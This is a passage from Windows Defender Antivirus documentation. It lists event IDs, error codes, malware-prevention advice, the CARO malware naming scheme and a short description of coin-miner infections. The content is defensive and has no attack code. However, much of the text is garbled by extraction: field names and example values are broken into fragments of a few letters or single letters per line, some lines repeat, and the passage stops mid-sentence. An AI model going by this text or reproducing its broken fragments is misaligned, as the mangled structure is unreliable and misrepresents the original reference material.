Vers
ion:
<Cu
rren
t
engi
ne
versi
on>
Dyn
amic
Sign
atur
e
Typ
e:
<Dy
nam
ic
sign
atur
e
type
>,
for
exa
mpl
e:
V
e
r
s
i
o
n
T
i
m
e
s
t
a
m
p
N
o
l
i
m
i
t
D
u
r
a
t
i
o
n
Pers
iste
nce
Path
:
<Pa
th>
Dyn
amic
Sign
atur
e
Vers
ion:
<Ve
rsio
n
num
ber
>
Dyn
amic
Sign
atur
e
Co
mpil
atio
n
Tim
esta
mp:
<Ti
mes
tam
p>
Rem
oval
Reas
on:
Pers
iste
nce
Limi
t
Typ
e:
<Pe
rsist
ence
limit
type
>,
for
exa
mpl
e:
V
D
M
v
e
r
s
i
o
n
T
i
m
e
s
t
a
m
p
N
o
l
i
m
i
t
Pers
iste
nce
Limi
t:
Pers
iste
nce
limit
of
the
fast
path
sign
atur
e.

client is in a healthy state. This event is reported when the
Dynamic Signature Service successfully deletes out-of-date
dynamic definitions.
EVENT ID: 2012
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_UPDATE

_FAILED
Message: The antimalware engine encountered an error when

trying to use the Dynamic Signature Service.
Description:
Description:
Windows Defender Antivirus has encountered an error trying
to use Dynamic Signature Service.
Curr
ent
Sign
atur
e
Vers
ion:
<Cu
rren
t
sign
atur
e
versi
on>
Sign
atur
e
Typ
e:
<Sig
natu
re
type
>,
for
exa
mpl
e:
A
n
t
i
v
i
r
u
s
A
n
t
i
s
p
y
w
a
r
e
A
n
t
i
m
a
l
w
a
r
e
N
e
t
w
o
r
k
I
n
s
p
e
c
t
i
o
n
S
y
s
t
e
m
Curr
ent
Engi
ne
Vers
ion:
<Cu
rren
t
engi
ne
versi
on>
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
Dyn
amic
Sign
atur
e
Typ
e:
<Dy
nam
ic
sign
atur
e
type
>,
for
exa
mpl
e:
V
e
r
s
i
o
n
T
i
m
e
s
t
a
m
p
N
o
l
i
m
i
t
D
u
r
a
t
i
o
n
Pers
iste
nce
Path
:
<Pa
th>
Dyn
amic
Sign
atur
e
Vers
ion:
<Ve
rsio
n
num
ber
>
Dyn
amic
Sign
atur
e
Co
mpil
atio
n
Tim
esta
mp:
<Ti
mes
tam
p>
Pers
iste
nce
Limi
t
Typ
e:
<Pe
rsist
ence
limit
type
>,
for
exa
mpl
e:
V
D
M
v
e
r
s
i
o
n
T
i
m
e
s
t
a
m
p
N
o
l
i
m
i
t
Pers
iste
nce
Limi
t:
Pers
iste
nce
limit
of
the
fast
path
sign
atur
e.
User action: Check your Internet connectivity settings.
EVENT ID: 2013
Symbolic name: MALWAREPROTECTION_SIGNATURE_FASTPATH_DELETE

D_ALL
Message: The Dynamic Signature Service deleted all dynamic

definitions.
Description: Windows Defender Antivirus discarded all
Dynamic Signature Service signatures.
Curr
ent
Sign
atur
e
Vers
ion:
<Cu
rren
t
sign
atur
e
versi
on>
EVENT ID: 2020
Symbolic name: MALWAREPROTECTION_CLOUD_CLEAN_RESTORE_FILE_D

OWNLOADED
Message: The antimalware engine downloaded a clean file.

Description: Windows Defender Antivirus downloaded a clean file.
Filen
ame
:
<Fil
e
nam
e>
Na
me
of
the
file.
Curr
ent
Sign
atur
e
Vers
ion:
<Cu
rren
t
sign
atur
e
versi
on>
Curr
ent
Engi
ne
Vers
ion:
<Cu
rren
t
engi
ne
versi
on>
EVENT ID: 2021
Symbolic name: MALWAREPROTECTION_CLOUD_CLEAN_RESTORE_FILE_D

OWNLOAD_FAILED
Message: The antimalware engine failed to download a clean file.

to download a clean file.
Filen
ame
:
<Fil
e
nam
e>
Na
me
of
the
file.
Curr
ent
Sign
atur
e
Vers
ion:
<Cu
rren
t
sign
atur
e
versi
on>
Curr
ent
Engi
ne
Vers
ion:
<Cu
rren
t
engi
ne
versi
on>
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
User action: Check your Internet connectivity settings. The Windows

Defender Antivirus client encountered an error when using
the Dynamic Signature Service to download the latest
definitions to a specific threat. This error is likely caused by a
network connectivity issue.
EVENT ID: 2030
Symbolic name: MALWAREPROTECTION_OFFLINE_SCAN_INSTALLED
Message: The antimalware engine was downloaded and is

configured to run offline on the next system restart.
Description: Windows Defender Antivirus downloaded and configured

offline antivirus to run on the next reboot.
EVENT ID: 2031
Symbolic name: MALWAREPROTECTION_OFFLINE_SCAN_INSTALL_FAILED
Message: The antimalware engine was unable to download and

configure an offline scan.
to download and configure offline antivirus.
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
EVENT ID: 2040
Symbolic name: MALWAREPROTECTION_OS_EXPIRING
Message: Antimalware support for this operating system version

will soon end.
Description: The support for your operating system will expire shortly.
Running Windows Defender Antivirus on an out of support
operating system is not an adequate solution to protect
against threats.
EVENT ID: 2041

Symbolic name: MALWAREPROTECTION_OS_EOL
Message: Antimalware support for this operating system has

ended. You must upgrade the operating system for
continued support.
Description: The support for your operating system has expired. Running
Windows Defender Antivirus on an out of support operating
system is not an adequate solution to protect against threats.
EVENT ID: 2042
Symbolic name: MALWAREPROTECTION_PROTECTION_EOL
Message: The antimalware engine no longer supports this

operating system, and is no longer protecting your
system from malware.
Description: The support for your operating system has expired. Windows
Defender Antivirus is no longer supported on your operating
system, has stopped functioning, and is not protecting
against malware threats.
EVENT ID: 3002
Symbolic name: MALWAREPROTECTION_RTP_FEATURE_FAILURE
Message: Real-time protection encountered an error and failed.
Description: Windows Defender Antivirus Real-Time Protection feature has

encountered an error and failed.
Feat
ure:
<Fe
atur
e>,
for
exa
mpl
e:
O
n
A
c
c
e
s
s
I
n
t
e
r
n
e
t
E
x
p
l
o
r
e
r
d
o
w
n
l
o
a
d
s
a
n
d
M
i
c
r
o
s
o
f
t
O
u
t
l
o
o
k
E
x
p
r
e
s
s
a
t
t
a
c
h
m
e
n
t
s
B
e
h
a
v
i
o
r
m
o
n
i
t
o
r
i
n
g
N
e
t
w
o
r
k
I
n
s
p
e
c
t
i
o
n
S
y
s
t
e
m
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
Reas
on:
The
reas
on
Win
dow
s
Defe
nder
Anti
viru
s
real-
time
prot
ecti
on
has
rest
arte
da
feat
ure.
User action: You should restart the system then run a full scan because
it's possible the system was not protected for some time. The
Windows Defender Antivirus client's real-time protection
feature encountered an error because one of the services
failed to start. If it is followed by a 3007 event ID, the failure
was temporary and the antimalware client recovered from
the failure.
EVENT ID: 3007
Symbolic name: MALWAREPROTECTION_RTP_FEATURE_RECOVERED
Message: Real-time protection recovered from a failure. We

recommend running a full system scan when you see this
error.
Description: Windows Defender Antivirus Real-time Protection has

restarted a feature. It is recommended that you run a full
system scan to detect any items that may have been missed
while this agent was down.
Feat
ure:
<Fe
atur
e>,
for
exa
mpl
e:
O
n
A
c
c
e
s
s
I
E
d
o
w
n
l
o
a
d
s
a
n
d
O
u
t
l
o
o
k
E
x
p
r
e
s
s
a
t
t
a
c
h
m
e
n
t
s
B
e
h
a
v
i
o
r
m
o
n
i
t
o
r
i
n
g
N
e
t
w
o
r
k
I
n
s
p
e
c
t
i
o
n
S
y
s
t
e
m
Reas
on:
The
reas
on
Win
dow
s
Defe
nder
Anti
viru
s
real-
time
prot
ecti
on
has
rest
arte
da
feat
ure.
User action: The real-time protection feature has restarted. If this event
happens again, contact Microsoft Technical Support.
EVENT ID: 5000
Symbolic name: MALWAREPROTECTION_RTP_ENABLED

Message: Real-time protection is enabled.
Description: Windows Defender Antivirus real-time protection scanning

for malware and other potentially unwanted software was
enabled.
EVENT ID: 5001
Symbolic name: MALWAREPROTECTION_RTP_DISABLED
Message: Real-time protection is disabled.
Description: Windows Defender Antivirus real-time protection scanning

for malware and other potentially unwanted software was
disabled.
EVENT ID: 5004
Symbolic name: MALWAREPROTECTION_RTP_FEATURE_CONFIGURED
Message: The real-time protection configuration changed.
Description: Windows Defender Antivirus real-time protection feature

configuration has changed.
Feat
ure:
<Fe
atur
e>,
for
exa
mpl
e:
O
n
A
c
c
e
s
s
I
E
d
o
w
n
l
o
a
d
s
a
n
d
O
u
t
l
o
o
k
E
x
p
r
e
s
s
a
t
t
a
c
h
m
e
n
t
s
B
e
h
a
v
i
o
r
m
o
n
i
t
o
r
i
n
g
N
e
t
w
o
r
k
I
n
s
p
e
c
t
i
o
n
S
y
s
t
e
m
Con
figur
atio
n:
EVENT ID: 5007
Symbolic name: MALWAREPROTECTION_CONFIG_CHANGED
Message: The antimalware platform configuration changed.
Description: Windows Defender Antivirus configuration has changed. If

this is an unexpected event you should review the settings as
this may be the result of malware.
Old
valu
e:
<Ol
d
valu
e
num
ber
>
Old
anti
viru
s
conf
igur
atio
n
valu
e.
New
valu
e:
<Ne
w
valu
e
num
ber
>
New
anti
viru
s
conf
igur
atio
n
valu
e.
EVENT ID: 5008
Symbolic name: MALWAREPROTECTION_ENGINE_FAILURE

Message: The antimalware engine encountered an error and
failed.
Description: Windows Defender Antivirus engine has been terminated due

to an unexpected error.
Failu
re
Typ
e:
<Fai
lure
type
>,
for
exa
mpl
e:
Cras
h or
Han
g
Exce
ptio
n
Cod
e:
<Err
or
cod
e>
Res
ourc
e:
<Re
sour
ce>
User action: To troubleshoot this event:

1. Try to restart the service.
For antimalware, antivirus and spyware, at an
elevated command prompt, type net stop
msmpsvc, and then type net start msmpsvc
to restart the antimalware engine.
For the Network Inspection System, at an
elevated command prompt, type net start
nissrv, and then type net start nissrv to
restart the Network Inspection System engine
by using the NiSSRV.exe file.
2. If it fails in the same way, look up the error code by
accessing the Microsoft Support Site and entering the
error number in the Search box, and contact
Microsoft Technical Support.
User action: The Windows Defender Antivirus client engine stopped due
to an unexpected error. To troubleshoot this event:
for the error code.
EVENT ID: 5009
Symbolic name: MALWAREPROTECTION_ANTISPYWARE_ENABLED
Message: Scanning for malware and other potentially unwanted

software is enabled.
Description: Windows Defender Antivirus scanning for malware and other

potentially unwanted software has been enabled.
EVENT ID: 5010
Symbolic name: MALWAREPROTECTION_ANTISPYWARE_DISABLED
Message: Scanning for malware and other potentially unwanted

software is disabled.
Description: Windows Defender Antivirus scanning for malware and other

potentially unwanted software is disabled.
EVENT ID: 5011
Symbolic name: MALWAREPROTECTION_ANTIVIRUS_ENABLED
Message: Scanning for viruses is enabled.
Description: Windows Defender Antivirus scanning for viruses has been

enabled.
EVENT ID: 5012
Symbolic name: MALWAREPROTECTION_ANTIVIRUS_DISABLED
Message: Scanning for viruses is disabled.
Description: Windows Defender Antivirus scanning for viruses is disabled.
EVENT ID: 5100
Symbolic name: MALWAREPROTECTION_EXPIRATION_WARNING_STATE
Message: The antimalware platform will expire soon.

Description: Windows Defender Antivirus has entered a grace period and
will soon expire. After expiration, this program will disable
protection against viruses, spyware, and other potentially
unwanted software.
Expi
ratio
n
Reas
on:
The
reas
on
Win
dow
s
Defe
nder
Anti
viru
s
will
expi
re.
Expi
ratio
n
Dat
e:
The
date
Win
dow
s
Defe
nder
Anti
viru
s
will
expi
re.
EVENT ID: 5101
Symbolic name: MALWAREPROTECTION_DISABLED_EXPIRED_STATE
Message: The antimalware platform is expired.

Description: Windows Defender Antivirus grace period has expired.
Protection against viruses, spyware, and other potentially
unwanted software is disabled.
Expi
ratio
n
Reas
on:
Expi
ratio
n
Dat
e:
Erro
r
Cod
e:
<Err
or
cod
e>
Res
ult
cod
e
asso
ciate
d
with
thre
at
stat
us.
Stan
dard
HRE
SUL
T
valu
es.
Erro
r
Des
cript
ion:
<Err
or
desc
ripti
on>
Des
cript
ion
of
the
erro
r.
Windows Defender Antivirus client error codes

If Windows Defender Antivirus experiences any issues it will usually give you an error code to help you
troubleshoot the issue. Most often an error means there was a problem installing an update. This section
provides the following information about Windows Defender Antivirus client errors.
The error code
The possible reason for the error
Advice on what to do now
Use the information in these tables to help troubleshoot Windows Defender Antivirus error codes.
ERROR CODE: 0X80508007
Message ERR_MP_NO_MEMORY
Possible reason This error indicates that you might have run out of memory.
Resolution 1. Check the available memory on your device.

2. Close any unused applications that are running to free
up memory on your device.
3. Restart the device and run the scan again.
ERROR CODE: 0X8050800C
Message ERR_MP_BAD_INPUT_DATA
Possible reason This error indicates that there might be a problem with your
security product.
Resolution 1. Update the definitions. Either:

a. Click the Update definitions button on the
Update tab in Windows Defender Antivirus.
Or,
b. Download the latest definitions from the
Windows Defender Security Intelligence site.
Note: The size of the definitions file
downloaded from the site can exceed 60 MB
and should not be used as a long-term
solution for updating definitions.
2. Run a full scan.
3. Restart the device and try again.
Message ERR_MP_BAD_CONFIGURATION
Possible reason This error indicates that there might be an engine

configuration error; commonly, this is related to input data
that does not allow the engine to function properly.
Message ERR_MP_QUARANTINE_FAILED
Possible reason This error indicates that Windows Defender Antivirus failed to
quarantine a threat.
Message ERR_MP_REBOOT_REQUIRED
Possible reason This error indicates that a reboot is required to complete

threat removal.
0X80508023
Message ERR_MP_THREAT_NOT_FOUND
Possible reason This error indicates that the threat might no longer be
present on the media, or malware might be stopping you
from scanning your device.
Resolution Run the Microsoft Safety Scanner then update your security
software and try again.
Message ERR_MP_FULL_SCAN_REQUIRED
Possible reason This error indicates that a full system scan might be required.
Resolution Run a full system scan.
Message ERR_MP_MANUAL_STEPS_REQUIRED
Possible reason This error indicates that manual steps are required to
complete threat removal.
Resolution Follow the manual remediation steps outlined in the

Microsoft Malware Protection Encyclopedia. You can find a
threat-specific link in the event history.
Message ERR_MP_REMOVE_NOT_SUPPORTED
Possible reason This error indicates that removal inside the container type
might not be not supported.
Resolution Windows Defender Antivirus is not able to remediate threats

detected inside the archive. Consider manually removing the
detected resources.

Message ERR_MP_REMOVE_LOW_MEDIUM_DISABLED
Possible reason This error indicates that removal of low and medium threats
might be disabled.
Resolution Check the detected threats and resolve them as required.
Message ERROR_MP_RESCAN_REQUIRED
Possible reason This error indicates a rescan of the threat is required.
Resolution Run a full system scan.
Message ERROR_MP_CALLISTO_REQUIRED
Possible reason This error indicates that an offline scan is required.
Resolution Run offline Windows Defender Antivirus. You can read about
how to do this in the offline Windows Defender Antivirus
article.
Message ERROR_MP_PLATFORM_OUTDATED
Possible reason This error indicates that Windows Defender Antivirus does
not support the current version of the platform and requires
a new version of the platform.
Resolution You can only use Windows Defender Antivirus in Windows

10. For Windows 8, Windows 7 and Windows Vista, you can
use System Center Endpoint Protection.
The following error codes are used during internal testing of Windows Defender Antivirus.
If you see these errors, you can try to update definitions and force a rescan directly on the endpoint.
INTERNAL ERROR CODES
ERROR CODE MESSAGE DISPLAYED POSSIBLE REASON FOR ERROR

AND RESOLUTION
0x80501004 ERROR_MP_NO_INTERNET Check your Internet

_CONN connection, then run the
scan again.
0x80501000 ERROR_MP_UI_CONSOLID This is an internal error. The

ATION_BASE cause is not clearly defined.
0x80501001 ERROR_MP_ACTIONS_FAIL
ED
0x80501002 ERROR_MP_NOENGINE
0x80501003 ERROR_MP_ACTIVE_THRE
ATS
0x805011011 MP_ERROR_CODE_LUA_CA
NCELLED
0x80501101 ERROR_LUA_CANCELLATI
ON
0x80501102 MP_ERROR_CODE_ALREA
DY_SHUTDOWN
0x80501103 MP_ERROR_CODE_RDEVIC
E_S_ASYNC_CALL_PENDIN
G
0x80501104 MP_ERROR_CODE_CANCE
LLED
0x80501105 MP_ERROR_CODE_NO_TA
RGETOS
0x80501106 MP_ERROR_CODE_BAD_RE
GEXP
0x80501107 MP_ERROR_TEST_INDUCE
D_ERROR
0x80501108 MP_ERROR_SIG_BACKUP_
DISABLED
0x80508001 ERR_MP_BAD_INIT_MODU
LES
0x80508002 ERR_MP_BAD_DATABASE
0x80508004 ERR_MP_BAD_UFS
0x8050800C ERR_MP_BAD_INPUT_DAT
A
0x8050800D ERR_MP_BAD_GLOBAL_ST
ORAGE
0x8050800E ERR_MP_OBSOLETE
0x8050800F ERR_MP_NOT_SUPPORTE
D
0x8050800F 0x80508010 ERR_MP_NO_MORE_ITEMS
0x80508011 ERR_MP_DUPLICATE_SCA
NID
0x80508012 ERR_MP_BAD_SCANID
0x80508013 ERR_MP_BAD_USERDB_VE
RSION
0x80508014 ERR_MP_RESTORE_FAILED
0x80508016 ERR_MP_BAD_ACTION
0x80508019 ERR_MP_NOT_FOUND
0x80509001 ERR_RELO_BAD_EHANDLE
0x80509003 ERR_RELO_KERNEL_NOT_L
OADED
0x8050A001 ERR_MP_BADDB_OPEN
0x8050A002 ERR_MP_BADDB_HEADER
0x8050A003 ERR_MP_BADDB_OLDENGI
NE
0x8050A004 ERR_MP_BADDB_CONTEN
T
0x8050A005 ERR_MP_BADDB_NOTSIG
NED
0x8050801 ERR_MP_REMOVE_FAILED This is an internal error. It

might be triggered when
malware removal is not
successful.
0x80508018 ERR_MP_SCAN_ABORTED This is an internal error. It

might have triggered when
a scan fails to complete.
Related topics
Report on Windows Defender Antivirus protection
Security intelligence
Here you will find information about different types of malware, safety tips on how you can protect your
organization, and resources for industry collaboration programs
Understand malware & other threats
How Microsoft identifies malware and PUA
Safety Scanner download
Keep up with the latest malware news and research. Check out our Windows security blogs and follow us on
Twitter for the latest news, discoveries, and protections.
Learn more about Windows security.
Understanding malware & other threats
Malware is a term used to describe malicious applications and code that can cause damage and disrupt normal use
of devices. Malware can allow unauthorized access, use system resources, steal passwords, lock you out of your
computer and ask for ransom, and more.
Cybercriminals that distribute malware are often motivated by money and will use infected computers to launch
attacks, obtain banking credentials, collect information that can be sold, sell access to computing resources, or
extort payment from victims.
As criminals become more sophisticated with their attacks, Microsoft is here to help. Windows 10 is the most
secure version of Windows yet and includes many features to help protect you whether you're at home, at work, or
on the go. With Windows Defender Advanced Threat Protection (Windows Defender ATP ), businesses can stay
protected with next-generation protection and other security capabilities.
For good general tips, check out the prevent malware infection topic.
There are many types of malware, including:
Coin miners
Macro malware
Phishing
Ransomware
Rootkits
Tech support scams
Trojans
Unwanted software
Worms
Keep up with the latest malware news and research. Check out our Windows security blogs and follow us on
Twitter for the latest news, discoveries, and protections.
Learn more about Windows security.
Prevent malware infection
Malware authors are always looking for new ways to infect computers. Follow the simple tips below to stay
protected and minimize threats to your data and accounts.
Keep software up-to-date

Exploits typically use vulnerabilities in popular software such as web browsers, Java, Adobe Flash Player, and
Microsoft Office to infect devices. Software updates patch vulnerabilities so they aren't available to exploits
anymore.
To keep Microsoft software up to date, ensure that automatic Microsoft Updates are enabled. Also, upgrade to the
latest version of Windows to benefit from a host of built-in security enhancements.
Be wary of links and attachments

Email and other messaging tools are a few of the most common ways your device can get infected. Attachments
or links in messages can open malware directly or can stealthily trigger a download. Some emails will give
instructions to allow macros or other executable content designed to make it easier for malware to infect your
devices.
Use an email service that provides protection against malicious attachments, links, and abusive senders.
Microsoft Office 365 has built-in antimalware, link protection, and spam filtering.
For more information, see phishing.
Watch out for malicious or compromised websites

By visiting malicious or compromised sites, your device can get infected with malware automatically or you can
get tricked into downloading and installing malware. See exploits and exploit kits as an example of how some of
these sites can automatically install malware to visiting computers.
To identify potentially harmful websites, keep the following in mind:
The initial part (domain) of a website address should represent the company that owns the site you are
visiting. Check the domain for misspellings. For example, malicious sites commonly use domain names
that swap the letter O with a zero (0) or the letters L and I with a one (1). If example.com is spelled
examp1e.com, the site you are visiting is suspect.
Sites that aggressively open popups and display misleading buttons often trick users into accepting
content through constant popups or mislabeled buttons.
To block malicious websites, use a modern web browser like Microsoft Edge which identifies phishing and
malware websites and checks downloads for malware.
If you encounter an unsafe site, click More [… ] > Send feedback on Microsoft Edge. You can also report unsafe
sites directly to Microsoft.
Pirated material on compromised websites
Using pirated content is not only illegal, it can also expose your device to malware. Sites that offer pirated
software and media are also often used to distribute malware when the site is visited. Sometimes pirated
software is bundled with malware and other unwanted software when downloaded, including intrusive browser
plugins and adware.
Users do not openly discuss visits to these sites, so any untoward experience are more likely to stay unreported.
To stay safe, download movies, music, and apps from official publisher websites or stores. Consider running a
streamlined OS such as Windows 10 Pro SKU S Mode, which ensures that only vetted apps from the Windows
Store are installed.
Don't attach unfamiliar removable drives

Some types of malware can spread by copying themselves to USB flash drives or other removable drives. There
are malicious individuals that intentionally prepare and distribute infected drives—leaving these drives in public
places to victimize unsuspecting individuals.
Only use removable drives that you are familiar with or that come from a trusted source. If a drive has been used
in publicly accessible devices, like computers in a café or a library, make sure you have antimalware running on
your computer before you use the drive. Avoid opening unfamiliar files you find on suspect drives, including
Office and PDF documents and executable files.
Use a non-administrator account

At the time they are launched, whether inadvertently by a user or automatically, most malware run under the
same privileges as the active user. This means that by limiting account privileges, you can prevent malware from
making consequential changes any devices.
By default, Windows uses User Account Control (UAC ) to provide automatic, granular control of privileges—it
temporarily restricts privileges and prompts the active user every time an application attempts to make
potentially consequential changes to the system. Although UAC helps limit the privileges of admin users, users
can simply override this restriction when prompted. As a result, it is quite easy for an admin user to inadvertently
allow malware to run.
To help ensure that everyday activities do not result in malware infection and other potentially catastrophic
changes, it is recommended that you use a non-administrator account for regular use. By using a non-
administrator account, you can prevent installation of unauthorized apps and prevent inadvertent changes to
system settings. Avoid browsing the web or checking email using an account with administrator privileges.
Whenever necessary, log in as an administrator to install apps or make configuration changes that require admin
privileges.
Read about creating user accounts and giving administrator privileges
Other safety tips

To further ensure that data is protected from malware as well as other threats:
Backup files. Follow the 3-2-1 rule: make 3 copies, store in at least 2 locations, with at least 1 offline
copy. Use OneDrive for reliable cloud-based copies that allows access to files from multiple devices and
helps recover damaged or lost files, including files locked by ransomware.
Be wary when connecting to public hotspots, particularly those that do not require authentication.
Use strong passwords and enable multi-factor authentication.
Do not use untrusted devices to log on to email, social media, and corporate accounts.
Software solutions
Microsoft provides comprehensive security capabilities that help protect against threats. We recommend:
Automatic Microsoft updates keeps software up-to-date to get the latest protections.
Controlled folder access stops ransomware in its tracks by preventing unauthorized access to your
important files. Controlled folder access locks down folders, allowing only authorized apps to access files.
Unauthorized apps, including ransomware and other malicious executable files, DLLs, and scripts are
denied access.
Microsoft Edge browser protects against threats such as ransomware by preventing exploit kits from
running. By using Microsoft SmartScreen, Microsoft Edge blocks access to malicious websites.
Microsoft Exchange Online Protection (EOP ) offers enterprise-class reliability and protection against spam
and malware, while maintaining access to email during and after emergencies.
Microsoft Safety Scanner helps remove malicious software from computers. NOTE: This tool does not
replace your antimalware product.
Microsoft 365 includes Office 365, Windows 10, and Enterprise Mobility + Security. These resources
power productivity while providing intelligent security across users, devices, and data.
Office 365 Advanced Threat Protection includes machine learning capabilities that block dangerous
emails, including millions of emails carrying ransomware downloaders.
OneDrive for Business can back up files, which you would then use to restore files in the event of an
infection.
Windows Defender Advanced Threat Protection provides comprehensive endpoint protection, detection,
and response capabilities to help prevent ransomware. In the event of a breach, Windows Defender ATP
alerts security operations teams about suspicious activities and automatically attempts to resolve the
problem. This includes alerts for suspicious PowerShell commands, connecting to a TOR website,
launching self-replicated copies, and deletion of volume shadow copies. Try Windows Defender ATP free
of charge.
Windows Hello for Business replaces passwords with strong two-factor authentication on your devices.
This authentication consists of a new type of user credential that is tied to a device and uses a biometric or
PIN. It lets user authenticate to an Active Directory or Azure Active Directory account.
Earlier than Windows 10 (not recommended)
Microsoft Security Essentials provides real-time protection for your home or small business device that
guards against viruses, spyware, and other malicious software.
What to do with a malware infection

Windows Defender ATP antivirus capabilities helps reduce the chances of infection and will automatically remove
threats that it detects.
In case threat removal is unsuccessful, read about troubleshooting malware detection and removal problems.
Malware names
We name the malware and unwanted software that we detect according to the Computer Antivirus Research
Organization (CARO ) malware naming scheme. The scheme uses the following format:
When our analysts research a particular threat, they will determine what each of the components of the name will
be.
Type
Describes what the malware does on your computer. Worms, viruses, trojans, backdoors, and ransomware are
some of the most common types of malware.
Adware
Backdoor
Behavior
BrowserModifier
Constructor
DDoS
Exploit
Hacktool
Joke
Misleading
MonitoringTool
Program
PWS
Ransom
RemoteAccess
Rogue
SettingsModifier
SoftwareBundler
Spammer
Spoofer
Spyware
Tool
Trojan
TrojanClicker
TrojanDownloader
TrojanNotifier
TrojanProxy
TrojanSpy
VirTool
Virus
Worm
Platforms
Indicates the operating system (such as Windows, Mac OS X, and Android) that the malware is designed to work
on. The platform is also used to indicate programming languages and file formats.
Operating systems
AndroidOS: Android operating system
DOS: MS -DOS platform
EPOC: Psion devices
FreeBSD: FreeBSD platform
iPhoneOS: iPhone operating system
Linux: Linux platform
MacOS: MAC 9.x platform or earlier
MacOS_X: MacOS X or later
OS2: OS2 platform
Palm: Palm operating system
Solaris: System V -based Unix platforms
SunOS: Unix platforms 4.1.3 or lower
SymbOS: Symbian operating system
Unix: general Unix platforms
Win16: Win16 (3.1) platform
Win2K: Windows 2000 platform
Win32: Windows 32-bit platform
Win64: Windows 64-bit platform
Win95: Windows 95, 98 and ME platforms
Win98: Windows 98 platform only
WinCE: Windows CE platform
WinNT: WinNT
Scripting languages
ABAP: Advanced Business Application Programming scripts
ALisp: ALisp scripts
AmiPro: AmiPro script
ANSI: American National Standards Institute scripts
AppleScript: compiled Apple scripts
ASP: Active Server Pages scripts
AutoIt: AutoIT scripts
BAS: Basic scripts
BAT: Basic scripts
CorelScript: Corelscript scripts
HTA: HTML Application scripts
HTML: HTML Application scripts
INF: Install scripts
IRC: mIRC/pIRC scripts
Java: Java binaries (classes)
JS: Javascript scripts
LOGO: LOGO scripts
MPB: MapBasic scripts
MSH: Monad shell scripts
MSIL: .Net intermediate language scripts
Perl: Perl scripts
PHP: Hypertext Preprocessor scripts
Python: Python scripts
SAP: SAP platform scripts
SH: Shell scripts
VBA: Visual Basic for Applications scripts
VBS: Visual Basic scripts
WinBAT: Winbatch scripts
WinHlp: Windows Help scripts
WinREG: Windows registry scripts
Macros
A97M: Access 97, 2000, XP, 2003, 2007, and 2010 macros
HE: macro scripting
O97M: Office 97, 2000, XP, 2003, 2007, and 2010 macros - those that affect Word, Excel, and Powerpoint
PP97M: PowerPoint 97, 2000, XP, 2003, 2007, and 2010 macros
V5M: Visio5 macros
W1M: Word1Macro
W2M: Word2Macro
W97M: Word 97, 2000, XP, 2003, 2007, and 2010 macros
WM: Word 95 macros
X97M: Excel 97, 2000, XP, 2003, 2007, and 2010 macros
XF: Excel formulas
XM: Excel 95 macros
Other file types
ASX: XML metafile of Windows Media .asf files
HC: HyperCard Apple scripts
MIME: MIME packets
Netware: Novell Netware files
QT: Quicktime files
SB: StarBasic (Staroffice XML ) files
SWF: Shockwave Flash files
TSQL: MS SQL server files
XML: XML files
Family
Grouping of malware based on common characteristics, including attribution to the same authors. Security
software providers sometimes use different names for the same malware family.
Variant letter
Used sequentially for every distinct version of a malware family. For example, the detection for the variant ".AF"
would have been created after the detection for the variant ".AE".
Suffixes
Provides extra detail about the malware, including how it is used as part of a multicomponent threat. In the
example above, "!lnk" indicates that the threat component is a shortcut file used by Trojan:Win32/Reveton.T.
.dam: damaged malware
.dll: Dynamic Link Library component of a malware
.dr: dropper component of a malware
.gen: malware that is detected using a generic signature
.kit: virus constructor
.ldr: loader component of a malware
.pak: compressed malware
.plugin: plug-in component
.remnants: remnants of a virus
.worm: worm component of that malware
!bit: an internal category used to refer to some threats
!cl: an internal category used to refer to some threats
!dha: an internal category used to refer to some threats
!pfn: an internal category used to refer to some threats
!plock: an internal category used to refer to some threats
!rfn: an internal category used to refer to some threats
!rootkit: rootkit component of that malware
@m: worm mailers
@mm: mass mailer worm
Coin miners
Cybercriminals are always looking for new ways to make money. With the rise of digital currencies, also known as
cryptocurrencies, criminals see a unique opportunity to infiltrate an organization and secretly mine for coins by
reconfiguring malware.
How coin miners work

Many infections start with:
Email messages with attachments that try to install malware.
Websites hosting exploit kits that attempt to use vulnerabilities in web browsers and other software to
install coin miners.
Websites taking advantage of computer processing power by running scripts while users browse the
website.
Mining is the process of running complex mathematical calculations necessary to maintain the blockchain ledger.
This process generates coins but requires significant computing resources.
Coin miners are not inherently malicious. Some individuals and organizations invest in hardware and electric
power for legitimate coin mining operations. However, others look for alternative sources of computing power and
try to find their way into corporate networks. These coin miners are not wanted in enterprise environments
because they eat up precious computing resources.
Cybercriminals see an opportunity to make money by running malware campaigns that distribute, install, and run
trojanized miners at the expense of other people’s computing resources.
Examples
DDE exploits, which have been known to distribute ransomware, are now delivering miners.
For example, a sample of the malware detected as Trojan:Win32/Coinminer (SHA-256:
7213cbbb1a634d780f9bb861418eb262f58954e6e5dca09ca50c1e1324451293) is installed by
Exploit:O97M/DDEDownloader.PA, a Word document that contains the DDE exploit.
The exploit launches a cmdlet that executes a malicious PowerShell script (Trojan:PowerShell/Maponeir.A), which
then downloads the trojanized miner: a modified version of the miner XMRig, which mines Monero
cryptocurrency.
How to protect against coin miners

Enable PUA detection: Some coin mining tools are not considered malware but are detected as potentially
unwanted applications (PUA). Many applications detected as PUA can negatively impact machine performance and
employee productivity. In enterprise environments, you can stop adware, torrent downloaders, and coin mining by
enabling PUA detection.
Since coin miners is becoming a popular payload in many different kinds of attacks, see general tips on how to
prevent malware infection.
For more information on coin miners, see the blog post Invisible resource thieves: The increasing threat of
cryptocurrency miners.
Exploits take advantage of vulnerabilities in software. A vulnerability is like a hole in your software that malware
